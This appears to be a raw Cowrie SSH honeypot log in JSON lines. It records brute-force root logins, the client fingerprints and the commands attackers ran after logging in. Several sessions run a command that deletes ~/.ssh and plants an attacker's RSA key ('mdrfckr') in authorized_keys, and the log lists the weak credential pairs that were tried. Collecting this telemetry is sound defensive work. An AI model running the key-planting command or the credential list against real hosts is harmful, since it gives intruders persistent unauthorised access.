{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:57:19.622018Z","src_ip":"212.227.235.229","session":"895c13e5d2f6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:57:20.581928Z","src_ip":"212.227.235.229","session":"895c13e5d2f6"}
{"eventid":"cowrie.login.success","username":"root","password":"qwer1234.","message":"login attempt [root/qwer1234.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:57:21.568732Z","src_ip":"212.227.235.229","session":"895c13e5d2f6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:57:22.089372Z","src_ip":"212.227.235.229","session":"895c13e5d2f6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:57:22.090146Z","src_ip":"212.227.235.229","session":"895c13e5d2f6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:57:22.091479Z","src_ip":"212.227.235.229","session":"895c13e5d2f6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:57:22.339221Z","src_ip":"212.227.235.229","session":"895c13e5d2f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":10400,"dst_ip":"1.2.3.4","dst_port":22,"session":"24d41acbcb15","protocol":"ssh","message":"New connection: 212.227.125.160:10400 (1.2.3.4:22) [session: 24d41acbcb15]","sensor":"my-vps","timestamp":"2025-08-26T12:57:22.549377Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:57:22.938727Z","src_ip":"212.227.235.229","session":"895c13e5d2f6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T12:57:22.939448Z","src_ip":"212.227.235.229","session":"895c13e5d2f6"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:57:23.095124Z","src_ip":"212.227.125.160","session":"24d41acbcb15"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T12:57:23.188250Z","src_ip":"212.227.235.229","session":"895c13e5d2f6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:57:23.189196Z","src_ip":"212.227.235.229","session":"895c13e5d2f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":30058,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce9283c47643","protocol":"ssh","message":"New connection: 212.227.125.160:30058 (1.2.3.4:22) [session: ce9283c47643]","sensor":"my-vps","timestamp":"2025-08-26T12:57:23.388293Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45258,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0515a5ae4e9","protocol":"ssh","message":"New connection: 212.227.235.229:45258 (1.2.3.4:22) [session: d0515a5ae4e9]","sensor":"my-vps","timestamp":"2025-08-26T12:57:23.413987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:57:23.415773Z","src_ip":"212.227.235.229","session":"d0515a5ae4e9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:57:23.634546Z","src_ip":"212.227.235.229","session":"d0515a5ae4e9"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:57:24.226892Z","src_ip":"212.227.125.160","session":"ce9283c47643"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T12:57:24.504837Z","src_ip":"212.227.235.229","session":"d0515a5ae4e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":30064,"dst_ip":"1.2.3.4","dst_port":22,"session":"de8e520f4a11","protocol":"ssh","message":"New connection: 212.227.125.160:30064 (1.2.3.4:22) [session: de8e520f4a11]","sensor":"my-vps","timestamp":"2025-08-26T12:57:25.304268Z"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:57:25.730515Z","src_ip":"212.227.235.229","session":"d0515a5ae4e9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:57:25.898584Z","src_ip":"212.227.125.160","session":"de8e520f4a11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43928,"dst_ip":"1.2.3.4","dst_port":22,"session":"1eabfe02ed4d","protocol":"ssh","message":"New connection: 212.227.235.229:43928 (1.2.3.4:22) [session: 1eabfe02ed4d]","sensor":"my-vps","timestamp":"2025-08-26T12:57:26.463151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:57:26.464156Z","src_ip":"212.227.235.229","session":"1eabfe02ed4d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:57:26.711252Z","src_ip":"212.227.235.229","session":"1eabfe02ed4d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":30066,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0b6be3fa750","protocol":"ssh","message":"New connection: 212.227.125.160:30066 (1.2.3.4:22) [session: f0b6be3fa750]","sensor":"my-vps","timestamp":"2025-08-26T12:57:27.199413Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 196.251.87.74:80 HTTP/1.0","message":"Remote SSH version: CONNECT 196.251.87.74:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-26T12:57:27.651808Z","src_ip":"212.227.125.160","session":"f0b6be3fa750"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:57:27.653189Z","src_ip":"212.227.125.160","session":"f0b6be3fa750"}
{"eventid":"cowrie.login.success","username":"root","password":"Asdf1234!@#$","message":"login attempt [root/Asdf1234!@#$] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:57:27.744235Z","src_ip":"212.227.235.229","session":"1eabfe02ed4d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:57:28.302740Z","src_ip":"212.227.235.229","session":"1eabfe02ed4d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:57:28.303591Z","src_ip":"212.227.235.229","session":"1eabfe02ed4d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:57:28.304703Z","src_ip":"212.227.235.229","session":"1eabfe02ed4d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:57:28.553322Z","src_ip":"212.227.235.229","session":"1eabfe02ed4d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46709,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a46067573ea","protocol":"ssh","message":"New connection: 212.227.235.229:46709 (1.2.3.4:22) [session: 5a46067573ea]","sensor":"my-vps","timestamp":"2025-08-26T12:57:28.969803Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:57:28.970509Z","src_ip":"212.227.235.229","session":"5a46067573ea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:57:29.065747Z","src_ip":"212.227.235.229","session":"1eabfe02ed4d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T12:57:29.066551Z","src_ip":"212.227.235.229","session":"1eabfe02ed4d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:57:29.216592Z","src_ip":"212.227.235.229","session":"5a46067573ea"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T12:57:29.316141Z","src_ip":"212.227.235.229","session":"1eabfe02ed4d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:57:29.317150Z","src_ip":"212.227.235.229","session":"1eabfe02ed4d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43944,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb92e2297e81","protocol":"ssh","message":"New connection: 212.227.235.229:43944 (1.2.3.4:22) [session: bb92e2297e81]","sensor":"my-vps","timestamp":"2025-08-26T12:57:29.558710Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:57:29.559610Z","src_ip":"212.227.235.229","session":"bb92e2297e81"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:57:29.806307Z","src_ip":"212.227.235.229","session":"bb92e2297e81"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:57:30.147484Z","src_ip":"212.227.235.229","session":"5a46067573ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":30070,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbf3a4f550a4","protocol":"ssh","message":"New connection: 212.227.125.160:30070 (1.2.3.4:22) [session: dbf3a4f550a4]","sensor":"my-vps","timestamp":"2025-08-26T12:57:30.335943Z"}
{"eventid":"cowrie.session.closed","duration":"10.7","message":"Connection lost after 10.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:57:30.364353Z","src_ip":"212.227.235.229","session":"895c13e5d2f6"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:57:30.368740Z","src_ip":"212.227.235.229","session":"5a46067573ea"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T12:57:30.831222Z","src_ip":"212.227.235.229","session":"bb92e2297e81"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:57:30.976568Z","src_ip":"212.227.125.160","session":"dbf3a4f550a4"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:57:32.079920Z","src_ip":"212.227.235.229","session":"bb92e2297e81"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43954,"dst_ip":"1.2.3.4","dst_port":22,"session":"da9d18213f86","protocol":"ssh","message":"New connection: 212.227.235.229:43954 (1.2.3.4:22) [session: da9d18213f86]","sensor":"my-vps","timestamp":"2025-08-26T12:57:32.326568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:57:32.327523Z","src_ip":"212.227.235.229","session":"da9d18213f86"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:57:33.520016Z","src_ip":"212.227.235.229","session":"da9d18213f86"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:57:34.265692Z","src_ip":"212.227.235.229","session":"da9d18213f86"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:57:34.515193Z","src_ip":"212.227.235.229","session":"da9d18213f86"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:57:34.517114Z","src_ip":"212.227.235.229","session":"1eabfe02ed4d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59382,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7ed82525b57","protocol":"ssh","message":"New connection: 212.227.235.229:59382 (1.2.3.4:22) [session: d7ed82525b57]","sensor":"my-vps","timestamp":"2025-08-26T12:57:42.999336Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:57:43.000156Z","src_ip":"212.227.235.229","session":"d7ed82525b57"}
